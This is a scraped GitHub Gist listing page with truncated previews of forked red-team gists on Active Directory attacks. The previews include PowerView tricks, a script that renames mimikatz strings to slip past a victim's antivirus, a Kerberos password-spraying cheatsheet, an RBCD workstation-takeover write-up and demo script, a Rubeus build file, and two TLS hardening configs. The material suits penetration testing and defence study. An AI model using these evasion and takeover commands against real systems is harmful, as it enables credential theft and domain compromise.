Skip to content

Instantly share code, notes, and snippets.

michiiii / PowerView-3.0-tricks.ps1
Created Nov 23, 2021 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
View PowerView-3.0-tricks.ps1
# PowerView's last major overhaul is detailed here:
# tricks for the 'old' PowerView are at
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
# This script downloads and slightly "obfuscates" the mimikatz project.
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "" ...,
# so removing them from the project before compiling gets us past most of the AV solutions.
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ....,
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program.
git clone windows
mv windows/mimikatz windows/candycrush
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/candycrush/g'
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/CANDYCRUSH/g'
michiiii /
Created Nov 23, 2021 — forked from TarlogicSecurity/
A cheatsheet with commands that can be used to perform kerberos attacks

Kerberos cheatsheet



python -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

michiiii /
Created Nov 23, 2021 — forked from S3cur3Th1sSh1t/
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure


In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

michiiii / rbcd_demo.ps1
Created Apr 28, 2021 — forked from HarmJ0y/rbcd_demo.ps1
Resource-based constrained delegation computer DACL takeover demo
View rbcd_demo.ps1
# import the necessary toolsets
Import-Module .\powermad.ps1
Import-Module .\powerview.ps1
# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account
# the target computer object we're taking over
$TargetComputer = "primary.testlab.local"
michiiii / Jenkinsfile
Created Apr 28, 2021 — forked from HarmJ0y/Jenkinsfile
Rubeus Jenkinsfile
View Jenkinsfile
@Library('ci-jenkins-common') _
// Jenkins build pipeline (declarative)
// Project: Seatbelt
// URL:
// Author: @tifkin_/@harmj0y
// Pipeline Author: harmj0y
def gitURL = ""
michiiii / nginx-tls.conf
Created Mar 17, 2021 — forked from gavinhungry/nginx-tls.conf
Nginx SSL/TLS configuration for "A+" Qualys SSL Labs rating
View nginx-tls.conf
# Name: nginx-tls.conf
# Auth: Gavin Lloyd <>
# Desc: Nginx SSL/TLS configuration for "A+" Qualys SSL Labs rating
# Enables HTTP/2, PFS, HSTS and OCSP stapling. Configuration options not related
# to SSL/TLS are not included here.
# Additional tips:
michiiii / setupiisforsslperfectforwardsecrecy_v17.ps1
Created Mar 17, 2021 — forked from jbratu/setupiisforsslperfectforwardsecrecy_v17.ps1
Great powershell script for tightening HTTPS security on IIS and disabling insecure protocols and ciphers. Very useful on core installations.
View setupiisforsslperfectforwardsecrecy_v17.ps1
# Copyright 2019, Alexander Hass
# After running this script the computer only supports:
# - TLS 1.2
# Version 3.0.1, see CHANGELOG.txt for changes.
Write-Host 'Configuring IIS with SSL/TLS Deployment Best Practices...'
Write-Host '--------------------------------------------------------------------------------'